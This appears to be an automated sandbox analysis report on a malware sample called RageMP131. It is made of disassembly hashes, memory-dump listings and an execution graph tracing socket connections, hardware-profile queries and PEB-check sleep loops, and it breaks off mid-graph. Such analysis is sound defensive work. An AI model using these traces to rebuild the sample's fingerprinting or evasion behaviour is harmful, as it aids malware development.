                                  • Opcode ID: 33224eedb60b00052ef9821f182cdade65a20e2118268496b1892af6ab0dfaae
                                  • Instruction ID: 7ffc48444c00a5f2e5916a8a396a0ec09ac2cac1ba2a6e4d85042cf0187bbedf
                                  • Opcode Fuzzy Hash: 33224eedb60b00052ef9821f182cdade65a20e2118268496b1892af6ab0dfaae
                                  • Instruction Fuzzy Hash: 51F0C9BA500605AF870ADF55D505886FBE9FA45710701852FE52ACB710E7B0E524CFA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0033B612
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Px3$invalid hash bucket count
                                  • API String ID: 909987262-3929844800
                                  • Opcode ID: 2c31a51e89d1f531b10096a841aae069538f5ced431e223398b4d968c871e341
                                  • Instruction ID: baa2fb8dfb592d1c246ee4ada5ba0da3aca42410c3c89a65fff46d1c7481fffa
                                  • Opcode Fuzzy Hash: 2c31a51e89d1f531b10096a841aae069538f5ced431e223398b4d968c871e341
                                  • Instruction Fuzzy Hash: 007110B5A00609DFCB15CF49C18086AFBF5FF89300B24C5AAE9599B356D731EA41CF90
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0033E491
                                  Strings
                                  • type must be string, but is , xrefs: 0033E4F8
                                  • type must be boolean, but is , xrefs: 0033E582
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: bfa142b9c803a961c630923ba647d987ddd347ad785699a15434d44261b3eab8
                                  • Instruction ID: 63bb39df0c3336eab0832f6b413576b0e73107a3a0c755c4eac858a0ff2882fb
                                  • Opcode Fuzzy Hash: bfa142b9c803a961c630923ba647d987ddd347ad785699a15434d44261b3eab8
                                  • Instruction Fuzzy Hash: 3B4189B5900248AFCB16EBA4E842F9EB7A8DF04300F144678F419DB6C2EB35ED40C792
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C3078
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 00000007.00000002.4145584611.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4146167296.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147267330.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147310163.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4147847240.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.4148165343.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: cdbe7dc67c6cbed460adb684ff0e0d72b18ec48e5f3dce6c7405cfac71d5c719
                                  • Instruction ID: d4901aacff365470a7f5fdc28c78e6377a10569d98a2c594d6814354f05a432c
                                  • Opcode Fuzzy Hash: cdbe7dc67c6cbed460adb684ff0e0d72b18ec48e5f3dce6c7405cfac71d5c719
                                  • Instruction Fuzzy Hash: 67E0EDB69012089FC711DFA8990598AFBE8AB19701F0086AAE948DB300F6B0A9548BD1

                                  Execution Graph

                                  Execution Coverage:2.9%
                                  Dynamic/Decrypted Code Coverage:1.1%
                                  Signature Coverage:0%
                                  Total number of Nodes:739
                                  Total number of Limit Nodes:73
                                  execution_graph 19970 2de0a0 WSAStartup 19971 2de0d8 19970->19971 19972 2de1a7 19970->19972 19971->19972 19973 2de175 socket 19971->19973 19973->19972 19974 2de18b connect 19973->19974 19974->19972 19975 2de19d closesocket 19974->19975 19975->19972 19975->19973 21039 4e107f2 21042 4e1081c 21039->21042 21041 4e10808 21043 4e1083d GetCurrentHwProfileW 21042->21043 21045 4e10932 21043->21045 21045->21041 19483 3b5d2c 19484 3b5d35 __dosmaperr 19483->19484 19485 3b63f3 __dosmaperr RtlAllocateHeap 19484->19485 19491 3b5d4c 19484->19491 19486 3b5d79 __dosmaperr 19485->19486 19487 3b5db9 19486->19487 19488 3b5d81 __dosmaperr 19486->19488 19489 3b5a09 __dosmaperr RtlAllocateHeap 19487->19489 19490 3b6db3 __freea RtlAllocateHeap 19488->19490 19492 3b5dc4 19489->19492 19490->19491 19493 3b6db3 __freea RtlAllocateHeap 19492->19493 19493->19491 20004 2dea00 20009 2dea62 20004->20009 20005 2df193 20006 3a47b0 RtlAllocateHeap 20007 2df1b3 20006->20007 20019 39e4bb 20007->20019 20009->20005 20009->20006 20020 39e4c6 20019->20020 20021 39e4d9 20020->20021 20022 3b0259 std::locale::_Setgloballocale 20020->20022 20028 39e4e8 20021->20028 20024 3bc7c6 std::locale::_Setgloballocale RtlAllocateHeap 20022->20024 20027 3b0269 std::locale::_Setgloballocale 20022->20027 20024->20027 20025 3af224 std::locale::_Setgloballocale RtlAllocateHeap 20026 3b029c 20025->20026 20027->20025 20029 39e4fe 20028->20029 20036 39e46e 20029->20036 20031 39e583 20031->20021 20032 39e50e Concurrency::cancel_current_task 20032->20031 20033 3a9136 4 API calls 20032->20033 20034 39e57d 20032->20034 20033->20034 20034->20031 20035 3a8be8 5 API calls 20034->20035 20035->20031 20037 39e47a __EH_prolog3_GS 20036->20037 20044 2c2980 20037->20044 20041 39e4a3 20065 2c28d0 20041->20065 20043 39e4ab 20043->20032 20045 2c29a2 20044->20045 20045->20045 20046 2c2ae0 RtlAllocateHeap 20045->20046 20047 2c29b4 20046->20047 20048 2c3190 20047->20048 20070 32a770 20048->20070 20050 2c31be 20051 2c31e1 20050->20051 20087 3306c0 20050->20087 20102 32a4f0 20051->20102 20054 2c3236 20055 2c3260 20054->20055 20056 2c332b 20054->20056 20057 3a0651 ___std_exception_copy RtlAllocateHeap 20055->20057 20058 3a47b0 RtlAllocateHeap 20056->20058 20060 2c32cb 20057->20060 20058->20060 20059 2c32fa 20059->20041 20060->20059 20061 3a47b0 RtlAllocateHeap 20060->20061 20062 2c3335 20061->20062 20107 3a06b4 20062->20107 20064 2c3355 20064->20041 20066 2c28db 20065->20066 20068 2c28f6 20065->20068 20067 3a47b0 RtlAllocateHeap 20066->20067 20066->20068 20069 2c291a 20067->20069 20068->20043 20069->20043 20071 32a799 20070->20071 20072 32a851 20071->20072 20075 32a7aa 20071->20075 20073 2c2270 RtlAllocateHeap 20072->20073 20074 32a856 20073->20074 20078 2c21d0 Concurrency::cancel_current_task RtlAllocateHeap 20074->20078 20076 32a7b6 std::locale::_Locimp::_Locimp 20075->20076 20077 32a7db 20075->20077 20080 32a814 20075->20080 20081 32a81d 20075->20081 20076->20050 20082 39f290 std::_Facet_Register RtlAllocateHeap 20077->20082 20079 32a7ee 20078->20079 20083 3a47b0 RtlAllocateHeap 20079->20083 20086 32a7f5 std::locale::_Locimp::_Locimp 20079->20086 20080->20074 20080->20077 20085 39f290 std::_Facet_Register RtlAllocateHeap 20081->20085 20081->20086 20082->20079 20084 32a860 20083->20084 20084->20050 20085->20086 20086->20050 20088 330802 20087->20088 20090 3306e5 20087->20090 20089 2c2270 RtlAllocateHeap 20088->20089 20091 330807 20089->20091 20094 330743 20090->20094 20095 330750 20090->20095 20097 3306fa 20090->20097 20092 2c21d0 Concurrency::cancel_current_task RtlAllocateHeap 20091->20092 20100 33070a std::locale::_Locimp::_Locimp 20092->20100 20093 39f290 std::_Facet_Register RtlAllocateHeap 20093->20100 20094->20091 20094->20097 20099 39f290 std::_Facet_Register RtlAllocateHeap 20095->20099 20095->20100 20096 3a47b0 RtlAllocateHeap 20098 330811 20096->20098 20097->20093 20098->20051 20099->20100 20100->20096 20101 3307c0 std::locale::_Locimp::_Locimp 20100->20101 20101->20051 20103 32a504 20102->20103 20104 3306c0 RtlAllocateHeap 20103->20104 20105 32a514 std::locale::_Locimp::_Locimp 20103->20105 20106 32a55a 20104->20106 20105->20054 20106->20054 20108 3a06c8 20107->20108 20109 3a06c1 20107->20109 20108->20064 20110 3ad7d6 __freea RtlAllocateHeap 20109->20110 20110->20108 19208 323a40 19211 323a55 19208->19211 19209 323b28 GetPEB 19209->19211 19210 323a73 GetPEB 19210->19211 19211->19209 19211->19210 19212 323b9d Sleep 19211->19212 19213 323ae8 Sleep 19211->19213 19214 323bc7 19211->19214 19212->19211 19213->19211 19215 3306c0 19216 330802 19215->19216 19218 3306e5 19215->19218 19235 2c2270 19216->19235 19222 330743 19218->19222 19223 330750 19218->19223 19225 3306fa 19218->19225 19219 330807 19245 2c21d0 19219->19245 19221 39f290 std::_Facet_Register RtlAllocateHeap 19228 33070a std::locale::_Locimp::_Locimp 19221->19228 19222->19219 19222->19225 19223->19228 19230 39f290 19223->19230 19225->19221 19229 3307c0 std::locale::_Locimp::_Locimp 19228->19229 19249 3a47b0 19228->19249 19232 2c21d0 Concurrency::cancel_current_task ___std_exception_copy std::_Facet_Register 19230->19232 19231 39f2af 19231->19228 19231->19231 19232->19231 19252 3a0651 19232->19252 19470 39d6e9 19235->19470 19246 2c21de Concurrency::cancel_current_task 19245->19246 19247 3a0651 ___std_exception_copy RtlAllocateHeap 19246->19247 19248 2c2213 19247->19248 19248->19228 19250 3a46ec ___std_exception_copy RtlAllocateHeap 19249->19250 19251 3a47bf __Getctype 19250->19251 19253 3a065e ___std_exception_copy 19252->19253 19257 2c2213 19252->19257 19256 3a068b 19253->19256 19253->19257 19258 3b56b8 19253->19258 19267 3ad7d6 19256->19267 19257->19228 19259 3b56d4 19258->19259 19260 3b56c6 19258->19260 19270 3ad23f 19259->19270 19260->19259 19262 3b56ec 19260->19262 19264 3b56e6 19262->19264 19265 3ad23f __dosmaperr RtlAllocateHeap 19262->19265 19264->19256 19266 3b56dc 19265->19266 19273 3a47a0 19266->19273 19268 3b6db3 __freea RtlAllocateHeap 19267->19268 19269 3ad7ee 19268->19269 19269->19257 19276 3b5d2c 19270->19276 19381 3a46ec 19273->19381 19277 3b5d35 __dosmaperr 19276->19277 19284 3ad244 19277->19284 19287 3b63f3 19277->19287 19279 3b5d79 __dosmaperr 19280 3b5db9 19279->19280 19281 3b5d81 __dosmaperr 19279->19281 19295 3b5a09 19280->19295 19291 3b6db3 19281->19291 19284->19266 19286 3b6db3 __freea RtlAllocateHeap 19286->19284 19290 3b6400 __dosmaperr std::_Facet_Register 19287->19290 19288 3b642b RtlAllocateHeap 19289 3b643e __dosmaperr 19288->19289 19288->19290 19289->19279 19290->19288 19290->19289 19292 3b6de8 19291->19292 19293 3b6dbe __dosmaperr 19291->19293 19292->19284 19293->19292 19294 3ad23f __dosmaperr RtlAllocateHeap 19293->19294 19294->19292 19296 3b5a77 __dosmaperr 19295->19296 19299 3b59af 19296->19299 19298 3b5aa0 19298->19286 19300 3b59bb __fread_nolock std::_Lockit::_Lockit 19299->19300 19303 3b5b90 19300->19303 19302 3b59dd __dosmaperr 19302->19298 19304 3b5bc6 __Getctype 19303->19304 19305 3b5b9f __Getctype 19303->19305 19304->19302 19305->19304 19307 3bf2a7 19305->19307 19308 3bf327 19307->19308 19311 3bf2bd 19307->19311 19310 3b6db3 __freea RtlAllocateHeap 19308->19310 19333 3bf375 19308->19333 19312 3bf349 19310->19312 19311->19308 19315 3b6db3 __freea RtlAllocateHeap 19311->19315 19317 3bf2f0 19311->19317 19313 3b6db3 __freea RtlAllocateHeap 19312->19313 19316 3bf35c 19313->19316 19314 3bf383 19319 3bf3e3 19314->19319 19332 3b6db3 RtlAllocateHeap __freea 19314->19332 19320 3bf2e5 19315->19320 19321 3b6db3 __freea RtlAllocateHeap 19316->19321 19322 3b6db3 __freea RtlAllocateHeap 19317->19322 19334 3bf312 19317->19334 19318 3b6db3 __freea RtlAllocateHeap 19323 3bf31c 19318->19323 19324 3b6db3 __freea RtlAllocateHeap 19319->19324 19335 3be5ab 19320->19335 19326 3bf36a 19321->19326 19327 3bf307 19322->19327 19328 3b6db3 __freea RtlAllocateHeap 19323->19328 19329 3bf3e9 19324->19329 19330 3b6db3 __freea RtlAllocateHeap 19326->19330 19363 3bea0a 19327->19363 19328->19308 19329->19304 19330->19333 19332->19314 19375 3bf418 19333->19375 19334->19318 19336 3be5bc 19335->19336 19362 3be6a5 19335->19362 19337 3be5cd 19336->19337 19338 3b6db3 __freea RtlAllocateHeap 19336->19338 19339 3be5df 19337->19339 19340 3b6db3 __freea RtlAllocateHeap 19337->19340 19338->19337 19341 3be5f1 19339->19341 19342 3b6db3 __freea RtlAllocateHeap 19339->19342 19340->19339 19343 3b6db3 __freea RtlAllocateHeap 19341->19343 19344 3be603 19341->19344 19342->19341 19343->19344 19345 3be615 19344->19345 19346 3b6db3 __freea RtlAllocateHeap 19344->19346 19347 3be627 19345->19347 19348 3b6db3 __freea RtlAllocateHeap 19345->19348 19346->19345 19349 3be639 19347->19349 19350 3b6db3 __freea RtlAllocateHeap 19347->19350 19348->19347 19351 3be64b 19349->19351 19352 3b6db3 __freea RtlAllocateHeap 19349->19352 19350->19349 19353 3be65d 19351->19353 19354 3b6db3 __freea RtlAllocateHeap 19351->19354 19352->19351 19355 3be66f 19353->19355 19356 3b6db3 __freea RtlAllocateHeap 19353->19356 19354->19353 19357 3be681 19355->19357 19358 3b6db3 __freea RtlAllocateHeap 19355->19358 19356->19355 19359 3be693 19357->19359 19360 3b6db3 __freea RtlAllocateHeap 19357->19360 19358->19357 19361 3b6db3 __freea RtlAllocateHeap 19359->19361 19359->19362 19360->19359 19361->19362 19362->19317 19364 3bea6f 19363->19364 19365 3bea17 19363->19365 19364->19334 19366 3bea27 19365->19366 19368 3b6db3 __freea RtlAllocateHeap 19365->19368 19367 3bea39 19366->19367 19369 3b6db3 __freea RtlAllocateHeap 19366->19369 19370 3bea4b 19367->19370 19371 3b6db3 __freea RtlAllocateHeap 19367->19371 19368->19366 19369->19367 19372 3bea5d 19370->19372 19373 3b6db3 __freea RtlAllocateHeap 19370->19373 19371->19370 19372->19364 19374 3b6db3 __freea RtlAllocateHeap 19372->19374 19373->19372 19374->19364 19376 3bf444 19375->19376 19377 3bf425 19375->19377 19376->19314 19377->19376 19378 3bef31 __Getctype RtlAllocateHeap 19377->19378 19379 3bf43e 19378->19379 19380 3b6db3 __freea RtlAllocateHeap 19379->19380 19380->19376 19382 3a46fe ___std_exception_copy 19381->19382 19387 3a4723 19382->19387 19384 3a4716 19394 3a44dc 19384->19394 19388 3a4733 19387->19388 19391 3a473a ___std_exception_copy __Getctype 19387->19391 19400 3a4541 19388->19400 19390 3a4748 19390->19384 19391->19390 19392 3a46ec ___std_exception_copy RtlAllocateHeap 19391->19392 19393 3a47ac 19392->19393 19393->19384 19395 3a44e8 19394->19395 19396 3a44ff 19395->19396 19415 3a4587 19395->19415 19398 3a4587 ___std_exception_copy RtlAllocateHeap 19396->19398 19399 3a4512 19396->19399 19398->19399 19399->19264 19401 3a4550 19400->19401 19404 3b5ddd 19401->19404 19405 3b5df0 __dosmaperr 19404->19405 19406 3b63f3 __dosmaperr RtlAllocateHeap 19405->19406 19414 3a4572 19405->19414 19407 3b5e20 __dosmaperr 19406->19407 19408 3b5e5c 19407->19408 19411 3b5e28 __dosmaperr 19407->19411 19409 3b5a09 __dosmaperr RtlAllocateHeap 19408->19409 19412 3b5e67 19409->19412 19410 3b6db3 __freea RtlAllocateHeap 19410->19414 19411->19410 19413 3b6db3 __freea RtlAllocateHeap 19412->19413 19413->19414 19414->19391 19416 3a459a 19415->19416 19417 3a4591 19415->19417 19416->19396 19418 3a4541 ___std_exception_copy RtlAllocateHeap 19417->19418 19419 3a4596 19418->19419 19419->19416 19422 3b0259 19419->19422 19423 3b025e std::locale::_Setgloballocale 19422->19423 19426 3b0269 std::locale::_Setgloballocale 19423->19426 19428 3bc7c6 19423->19428 19449 3af224 19426->19449 19432 3bc7d2 __fread_nolock 19428->19432 19429 3b5d2c __dosmaperr RtlAllocateHeap 19434 3bc803 std::locale::_Setgloballocale 19429->19434 19430 3bc822 19431 3ad23f __dosmaperr RtlAllocateHeap 19430->19431 19433 3bc827 19431->19433 19432->19429 19432->19430 19432->19434 19436 3bc834 std::_Lockit::_Lockit std::locale::_Setgloballocale 19432->19436 19435 3a47a0 ___std_exception_copy RtlAllocateHeap 19433->19435 19434->19430 19434->19436 19448 3bc80c 19434->19448 19435->19448 19437 3bc8a7 19436->19437 19438 3bc9a4 std::_Lockit::~_Lockit 19436->19438 19440 3bc8d5 std::locale::_Setgloballocale 19436->19440 19437->19440 19452 3b5bdb 19437->19452 19439 3af224 std::locale::_Setgloballocale RtlAllocateHeap 19438->19439 19441 3bc9b7 19439->19441 19443 3b5bdb __Getctype RtlAllocateHeap 19440->19443 19446 3bc92a 19440->19446 19440->19448 19443->19446 19445 3b5bdb __Getctype RtlAllocateHeap 19445->19440 19447 3b5bdb __Getctype RtlAllocateHeap 19446->19447 19446->19448 19447->19448 19448->19426 19466 3af094 19449->19466 19451 3af235 19453 3b5be4 __dosmaperr 19452->19453 19454 3b63f3 __dosmaperr RtlAllocateHeap 19453->19454 19457 3b5bfb 19453->19457 19458 3b5c28 __dosmaperr 19454->19458 19455 3b5c30 __dosmaperr 19463 3b6db3 __freea RtlAllocateHeap 19455->19463 19456 3b5c8b 19456->19445 19457->19456 19459 3b0259 __Getctype RtlAllocateHeap 19457->19459 19458->19455 19460 3b5c68 19458->19460 19461 3b5c95 19459->19461 19462 3b5a09 __dosmaperr RtlAllocateHeap 19460->19462 19464 3b5c73 19462->19464 19463->19457 19465 3b6db3 __freea RtlAllocateHeap 19464->19465 19465->19457 19468 3af0c1 std::locale::_Setgloballocale 19466->19468 19467 3aef23 std::locale::_Setgloballocale RtlAllocateHeap 19469 3af10a std::locale::_Setgloballocale 19467->19469 19468->19467 19469->19451 19473 39d4af 19470->19473 19472 39d6fa Concurrency::cancel_current_task 19476 2c3010 19473->19476 19477 3a0651 ___std_exception_copy RtlAllocateHeap 19476->19477 19478 2c303d 19477->19478 19478->19472 20985 4e10854 20986 4e10858 GetCurrentHwProfileW 20985->20986 20988 4e10932 20986->20988 19494 2ca210 19495 39f290 std::_Facet_Register RtlAllocateHeap 19494->19495 19496 2ca248 19495->19496 19527 2c2ae0 19496->19527 19498 2ca28b 19543 3a5362 19498->19543 19502 2ca377 19504 2ca34e 19504->19502 19506 3a47b0 RtlAllocateHeap 19504->19506 19510 2ca399 19506->19510 19508 3a9136 4 API calls 19509 2ca2fc 19508->19509 19514 2ca318 19509->19514 19558 32cf60 19509->19558 19512 3a5362 RtlAllocateHeap 19510->19512 19513 2ca3d8 19512->19513 19517 3a9136 4 API calls 19513->19517 19520 2ca3f9 19513->19520 19563 3adbdf 19514->19563 19515 2ca423 19519 2ca3eb 19517->19519 19522 3a4eeb 2 API calls 19519->19522 19520->19515 19523 3a47b0 RtlAllocateHeap 19520->19523 19524 2ca3f1 19522->19524 19526 2ca439 19523->19526 19525 3a8be8 5 API calls 19524->19525 19525->19520 19528 2c2ba5 19527->19528 19533 2c2af6 19527->19533 19530 2c2270 RtlAllocateHeap 19528->19530 19529 2c2b02 std::locale::_Locimp::_Locimp 19529->19498 19531 2c2baa 19530->19531 19534 2c21d0 Concurrency::cancel_current_task RtlAllocateHeap 19531->19534 19532 2c2b2a 19538 39f290 std::_Facet_Register RtlAllocateHeap 19532->19538 19533->19529 19533->19532 19536 2c2b6e 19533->19536 19537 2c2b65 19533->19537 19535 2c2b3d 19534->19535 19539 3a47b0 RtlAllocateHeap 19535->19539 19542 2c2b46 std::locale::_Locimp::_Locimp 19535->19542 19541 39f290 std::_Facet_Register RtlAllocateHeap 19536->19541 19536->19542 19537->19531 19537->19532 19538->19535 19540 2c2bb4 19539->19540 19541->19542 19542->19498 19572 3a52a0 19543->19572 19545 2ca2d7 19545->19504 19546 3a9136 19545->19546 19547 3a9149 ___std_exception_copy 19546->19547 19596 3a8e8d 19547->19596 19549 3a915e 19550 3a44dc ___std_exception_copy RtlAllocateHeap 19549->19550 19551 2ca2ea 19550->19551 19552 3a4eeb 19551->19552 19553 3a4efe ___std_exception_copy 19552->19553 19729 3a4801 19553->19729 19555 3a4f0a 19556 3a44dc ___std_exception_copy RtlAllocateHeap 19555->19556 19557 2ca2f0 19556->19557 19557->19508 19559 32cfa7 19558->19559 19562 32cf78 __fread_nolock 19558->19562 19777 330560 19559->19777 19561 32cfba 19561->19514 19562->19514 19792 3adbfc 19563->19792 19565 2ca348 19566 3a8be8 19565->19566 19567 3a8bfb ___std_exception_copy 19566->19567 19916 3a8ac3 19567->19916 19569 3a8c07 19570 3a44dc ___std_exception_copy RtlAllocateHeap 19569->19570 19571 3a8c13 19570->19571 19571->19504 19573 3a52ac __fread_nolock 19572->19573 19574 3a52b3 19573->19574 19577 3a52d3 19573->19577 19575 3ad23f __dosmaperr RtlAllocateHeap 19574->19575 19576 3a52b8 19575->19576 19580 3a47a0 ___std_exception_copy RtlAllocateHeap 19576->19580 19578 3a52d8 19577->19578 19579 3a52e5 19577->19579 19581 3ad23f __dosmaperr RtlAllocateHeap 19578->19581 19586 3b6688 19579->19586 19585 3a52c3 19580->19585 19581->19585 19583 3a52ee 19584 3ad23f __dosmaperr RtlAllocateHeap 19583->19584 19583->19585 19584->19585 19585->19545 19587 3b6694 __fread_nolock std::_Lockit::_Lockit 19586->19587 19590 3b672c 19587->19590 19589 3b66af 19589->19583 19594 3b674f __fread_nolock 19590->19594 19591 3b63f3 __dosmaperr RtlAllocateHeap 19592 3b67b0 19591->19592 19593 3b6db3 __freea RtlAllocateHeap 19592->19593 19595 3b6795 __fread_nolock 19593->19595 19594->19591 19594->19595 19595->19589 19599 3a8e99 __fread_nolock 19596->19599 19597 3a8e9f 19598 3a4723 ___std_exception_copy RtlAllocateHeap 19597->19598 19602 3a8eba 19598->19602 19599->19597 19600 3a8ee2 __fread_nolock 19599->19600 19603 3a9010 19600->19603 19602->19549 19604 3a9023 19603->19604 19605 3a9036 19603->19605 19604->19602 19612 3a8f37 19605->19612 19607 3a9059 19611 3a90e7 19607->19611 19616 3a55d3 19607->19616 19611->19602 19613 3a8f48 19612->19613 19615 3a8fa0 19612->19615 19613->19615 19625 3ae13d 19613->19625 19615->19607 19617 3a55ec 19616->19617 19621 3a5613 19616->19621 19617->19621 19652 3b5f82 19617->19652 19619 3a5608 19659 3b538b 19619->19659 19622 3ae17d 19621->19622 19623 3ae05c __fread_nolock 2 API calls 19622->19623 19624 3ae196 19623->19624 19624->19611 19626 3ae151 ___std_exception_copy 19625->19626 19631 3ae05c 19626->19631 19628 3ae166 19629 3a44dc ___std_exception_copy RtlAllocateHeap 19628->19629 19630 3ae175 19629->19630 19630->19615 19636 3ba6de 19631->19636 19633 3ae06e 19634 3ae08a SetFilePointerEx 19633->19634 19635 3ae076 __fread_nolock 19633->19635 19634->19635 19635->19628 19637 3ba6eb 19636->19637 19640 3ba700 19636->19640 19649 3ad22c 19637->19649 19641 3ad22c __dosmaperr RtlAllocateHeap 19640->19641 19643 3ba725 19640->19643 19644 3ba730 19641->19644 19642 3ad23f __dosmaperr RtlAllocateHeap 19645 3ba6f8 19642->19645 19643->19633 19646 3ad23f __dosmaperr RtlAllocateHeap 19644->19646 19645->19633 19647 3ba738 19646->19647 19648 3a47a0 ___std_exception_copy RtlAllocateHeap 19647->19648 19648->19645 19650 3b5d2c __dosmaperr RtlAllocateHeap 19649->19650 19651 3ad231 19650->19651 19651->19642 19653 3b5f8e 19652->19653 19654 3b5fa3 19652->19654 19655 3ad23f __dosmaperr RtlAllocateHeap 19653->19655 19654->19619 19656 3b5f93 19655->19656 19657 3a47a0 ___std_exception_copy RtlAllocateHeap 19656->19657 19658 3b5f9e 19657->19658 19658->19619 19660 3b5397 __fread_nolock 19659->19660 19661 3b53d8 19660->19661 19663 3b541e 19660->19663 19665 3b539f 19660->19665 19662 3a4723 ___std_exception_copy RtlAllocateHeap 19661->19662 19662->19665 19663->19665 19666 3b549c 19663->19666 19665->19621 19667 3b54c4 19666->19667 19679 3b54e7 __fread_nolock 19666->19679 19668 3b54c8 19667->19668 19670 3b5523 19667->19670 19669 3a4723 ___std_exception_copy RtlAllocateHeap 19668->19669 19669->19679 19671 3b5541 19670->19671 19672 3ae17d 2 API calls 19670->19672 19680 3b4fe1 19671->19680 19672->19671 19675 3b5559 19675->19679 19685 3b4bb2 19675->19685 19676 3b55a0 19677 3b5609 WriteFile 19676->19677 19676->19679 19677->19679 19679->19665 19691 3c0d44 19680->19691 19682 3b5021 19682->19675 19682->19676 19683 3b4ff3 19683->19682 19700 3a9d10 19683->19700 19686 3b4c1a 19685->19686 19687 3a9d10 std::_Locinfo::_Locinfo_dtor 2 API calls 19686->19687 19690 3b4c2b std::_Locinfo::_Locinfo_dtor std::locale::_Locimp::_Locimp 19686->19690 19687->19690 19688 3b84be RtlAllocateHeap RtlAllocateHeap 19688->19690 19689 3b4ee1 _ValidateLocalCookies 19689->19679 19690->19688 19690->19689 19692 3c0d5e 19691->19692 19693 3c0d51 19691->19693 19695 3c0d6a 19692->19695 19696 3ad23f __dosmaperr RtlAllocateHeap 19692->19696 19694 3ad23f __dosmaperr RtlAllocateHeap 19693->19694 19697 3c0d56 19694->19697 19695->19683 19698 3c0d8b 19696->19698 19697->19683 19699 3a47a0 ___std_exception_copy RtlAllocateHeap 19698->19699 19699->19697 19701 3a4587 ___std_exception_copy RtlAllocateHeap 19700->19701 19702 3a9d20 19701->19702 19707 3b5ef3 19702->19707 19708 3b5f0a 19707->19708 19709 3a9d3d 19707->19709 19708->19709 19715 3bf4f3 19708->19715 19711 3b5f51 19709->19711 19712 3b5f68 19711->19712 19713 3a9d4a 19711->19713 19712->19713 19724 3bd81e 19712->19724 19713->19682 19716 3bf4ff __fread_nolock 19715->19716 19717 3b5bdb __Getctype RtlAllocateHeap 19716->19717 19719 3bf508 std::_Lockit::_Lockit 19717->19719 19718 3bf54e 19718->19709 19719->19718 19720 3bf574 __Getctype RtlAllocateHeap 19719->19720 19721 